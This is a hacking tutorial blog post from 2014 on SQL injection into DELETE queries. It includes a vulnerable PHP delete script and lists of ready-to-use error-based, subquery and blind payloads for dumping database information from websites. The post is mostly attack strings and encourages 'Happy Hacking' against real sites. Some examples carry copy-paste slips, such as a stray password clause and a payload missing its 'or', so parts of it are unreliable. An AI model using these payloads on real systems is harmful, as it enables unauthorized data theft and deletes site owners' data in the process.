Well the name itself say everything so i guess you don't need to be clarified what we are upto. But still for a small explaination, we will be injecting this time in Delete query. Okay dumping database base using a delete query sounds a little weird but we will successfully do it.

okay first thing you should remember don't try those other testing techniques with delete query else you will end up deleting the whole table of the website. Now the question arise!! how will you know the query in which you are going to inject is a delete query??

Well the answer is pretty simple "Common Sense". It really depends on the action you are performing using the form or any other way. What you really need to know is that what ever action you are performing if that is removing something then it should be the Delete Query injection type.

You can achieve this using the following Injections
1. Xpath Injection
2. Sub Query Injection
3. Blind Injection Both Techniques.

I strongly Suggest you to read them all as over here i wont be discussing in detail all these injections. Here we will discuss only some minor change in the injection and other things will remain same.

Same like Bypassing Login Form with SQL injection we will take a vulnerable Login script, and start exploring it.

Example:

$product_id=$_POST['product_id'];
$query="delete from products where product_id='$product_id'";
if (!mysql_query($query,$conn))
echo "Error While Deletion process : " . mysql_error();
else
echo "Deleted Sucessfully
";

Exploitation using XPATH injection.

It will work when the developer have inserted the error function over there. else only blind will work

Query:
delete from products where product_id="$product_id"
delete from products where product_id='$product_id'
Injection
' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''='
" or extractvalue(0x0a,concat(0x0a,(select database()))) and ""="
' or extractvalue(0x0a,concat(0x0a,(select database()))) --+
" or extractvalue(0x0a,concat(0x0a,(select database()))) --+
' or extractvalue(0x0a,concat(0x0a,(select database()))) #
" or extractvalue(0x0a,concat(0x0a,(select database()))) #
' or extractvalue(0x0a,concat(0x0a,(select database()))) --
" or extractvalue(0x0a,concat(0x0a,(select database()))) --

Now lets see what will the query passed. For the above given Query first injection will work.

delete from products where product_id='' or extractvalue(0x0a,concat(0x0a,(select database()))) and ''=''

So actually the above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Exploitation using Sub-Query Injection.

delete from products where product_id="$product_id"
delete from products where product_id='$product_id'
Injection
' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ''='
" or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="
' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
" or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --+
' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
" or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) #
' or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) --

Now lets see what will the query passed. For the above given Query Second injection will work.

delete from products where product_id="" or (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) and ""="" and password='$passwrd' limit 0,1

So actually the above query will output the data in form of error. for rest of Exploitation using Sub Query Injection.

Exploitation using Blind Injection

okay now as its blind we will again ask questions from the database if the data gets deleted that means it returned true else false.

okay first we need to find the right injection string to know what query is being used inside the application. okay as i told you earlier that we can not use those other testing methods because they can delete the whole database at once if worked. so testing will be a little different, so we will use and in place of or this time.

okay for example a valid query will be.
delete from products where product_id="C1"

where C1 is out input, so now for testing injection over here our injections form will be. We are using this type of injection so that we will only delete one row at a time. I will soon try to find some way to Bypass it and get our result without deleting the Database.

C1' and true--
C1' and true#
C1' and true--+
C1" and true--
C1" and true#
C1" and true--+

After each you gotta check if product or anything which you wanted to delete is deleted that means your injection worked, in our case 4th one will work
C1" and true--

okay that means we are commenting out the rest of query

let us start by checking the length of database().
Quering if the length of database() is equal to 10
product_id = " and (select 1 from dual where length(database())=10)--
if it delete the given product ID that means you are on your way else try another number then you can try checking other number and you can always use the greater and smaller than symbols to make the process faster.

Once you know the length of database() you can start collecting information by testing like Blind Injection. Read Blind SQL injection or rest of the Exploitation. Just change 'or' with 'and'.

Happy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06